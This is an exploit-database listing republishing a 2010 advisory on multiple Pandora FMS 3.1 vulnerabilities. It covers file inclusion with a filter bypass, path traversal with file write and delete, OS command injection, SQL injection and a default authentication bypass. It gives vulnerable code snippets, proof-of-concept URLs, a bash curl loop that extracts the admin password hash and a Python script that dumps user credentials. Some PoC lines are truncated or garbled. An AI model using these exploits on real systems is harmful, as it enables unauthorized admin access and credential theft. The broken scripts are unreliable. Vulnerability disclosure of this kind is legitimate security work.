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zdtJuan Galiana Lara1337DAY-ID-15008
HistoryDec 01, 2010 - 12:00 a.m.

Pandora FMS <= 3.1 Mullti Vulnerability

Juan Galiana Lara

Exploit for php platform in category web applications

Pandora FMS <= 3.1 Mullti Vulnerability

Path Traversal:
PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) -
CVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10
Parameter 'page' of ajax.php is not properly sanitizing user-supplied
input. The function safe_url_extraclean is filtering ':' character, and
it doesn't allow to use the string "http://"; to create urls, but allows
'/' character and an attacker could reference remote resources via
Windows UNC files, using //servername//resource/file
Note that the first check in safe_url_extraclean is filtering '://', so
we can bypass the filter easily doing http://http://url, and it only
strip the first protocol://. However, the last preg_replace strips the :
Proof of concept:
UNC: http://servername/pandora_console/ajax.php?page=//server/share/test
As well, ajax.php allows to include any php file in the disk
Character %00 is not allowed due safe_url_extraclean function filtering,
and is not possible to include other files distinct that php files, but
still allows . and / characters.
PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283
- - CVSS 7.9/10
An attacker can inject arbitrary PHP code and execute it remotely due
argv[1] parameter is not filtered in file pandora_diag.php.
Note: that issue needs register_globals set to On to be exploitable.
Path traversal & Local file inclusion vulnerabilities -
CVE-2010-4282 - CVSS 6.8/10
An attacker can include arbitrary files of the filesystem via id
parameter in file pandora_help.php.
Snippet of vulnerable code:
 24 $id = get_parameter ('id');
 26 /* Possible file locations */
 27 $files = array
 30         $config["homedir"]."/include/help/en/help_".$id.".php");
 31 $help_file = '';
 32 foreach ($files as $file) {
 33         if (file_exists ($file)) {
 34                 $help_file = $file;
 35                 break;
 36         }
 37 }
 62 require_once ($help_file);
Proof of concept:
This code is platform dependent bug, you can read more at
Only works in windows systems, an attacker can include local file using
../ characters due parameter id is not filtered
If magic_quotes_gpc is Off, arbitrary files can be included, like
boot.ini using NULL character (%00), if not, only php files are allowed
Path traversal & Arbitrary write and delete files - CVE-2010-4282
- - CVSS 8.0/10
In file operation/agentes/networkmap.php the 'layout' parameter is
handled in an insecure way and it is used to write and delete files on
the filesystem.
An attacker could use this parameter to write in arbitrary paths and
even remove files.
Snippet of vulnerable code:
32 $layout = (string) get_parameter ('layout', 'radial');
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
157         $fh = @fopen ($filename_dot, 'w');
158         if ($fh === false) {
159                 $result = false;
160         } else {
161                 fwrite ($fh, $graph);
162                 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng
- -o".$filename_img." ".$filename_dot;
163                 $result = system ($cmd);
164                 fclose ($fh);
165                 unlink ($filename_dot);
166         }
178         require ($filename_map);
Character sequences '../' could be used to write files (due -o parameter
in lines 162 and 163), as well as potentially remove files (line 157,
161 and 165) or include them (line 178)
As well like in 5.3 this issue is only exploitable in windows
environments because the same reason.


Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
The parameter group_id of operation/agentes/estado_agente.php is
vulnerable to blind sql injection.
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#configure host,cookie&group_id before use it
#$ ./
TARGET_USER="0x61646d696e" #admin
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v
w x y z)
while [[ $j -lt 33 ]]; do
    while [[ $i -lt ${#CHARSET[ () ]} ]]; do
        c=$(printf '%d' "'${CHARSET[$i]}")
        curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q
        if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;
        let i++
    if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo "Something went wrong!";
exit 1; fi
    let j++;
exit 0
The fix to these kind of issues was the implementation of a generic
filter against sql injection. A proper fix is planned for a major version.


SQL Injection - CVE-2010-4280 - CVSS 8.5/10
The parameter id_group when get_agents_group_json is equal to 1 is
vulnerable to SQL Injection attacks.
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and password from the database
#configure cookie&host before use it
import json
import urllib2
headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}
url = "http://HOST/pandora_console/ajax.php";
req = urllib2.Request(url,headers=headers)
resp = urllib2.urlopen(req)
users =
for user in users:
The fix to these kind of issues was the implementation of a generic
filter against sql injection. A proper fix is planned for a major version.


OS Command Injection - CVE-2010-4278 - CVSS 9/10
The layout parameter in file operation/agentes/networkmap.php is not
properly filtered and allows an attacker to inject OS commands.
Snippet of vulnerable code (file operation/agentes/networkmap.php):
32 $layout = (string) get_parameter ('layout', 'radial');
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
162                 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng
- -o".$filename_img." ".$filename_dot;
163                 $result = system ($cmd);
If we use vulnerability #1 (that permits bypass the authentication
system and login as admin) with this issue, the CVSS will be 10/10.


Authentication bypass - CVE-2010-4279 - CVSS: 10/10
An attacker could access to any account user, including admin, using the
"hash login" authentication process. This kind of authentication method
works providing a username and a hash. The issue could be exploited
remotely providing a username and the md5 of it when
$config['loginhash_pwd'] is empty, that in fact is the default
Snippet of vulnerable code in index.php:
136 // Hash login process
137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {
138         $loginhash_data = get_parameter("loginhash_data", "");
139         $loginhash_user = get_parameter("loginhash_user", "");
141         if ($loginhash_data ==
md5($loginhash_user.$config["loginhash_pwd"])) {
142                 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);
143                 $_SESSION['id_usuario'] = $loginhash_user;
144                 $config["id_user"] = $loginhash_user;
Proof of concept:
Got it! admin! :)
By default, any installation of this software allows unauthenticated
attackers to perform an authentication bypass and a privilege escalation
to admin.
1.1) Additionally, a manual modification in order to use the hash_hmac
function instead of the weak statement md5 ( $string . $KEY) is
encouraged for security purposes.
Snippet of code (index.php, version 3.1.1):
145 // Hash login process
150         if ($config["loginhash_pwd"] != "" && $loginhash_data ==
md5($loginhash_user.$config["loginhash_pwd"])) {
In line 150, use
hash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of

# [2018-01-05]  #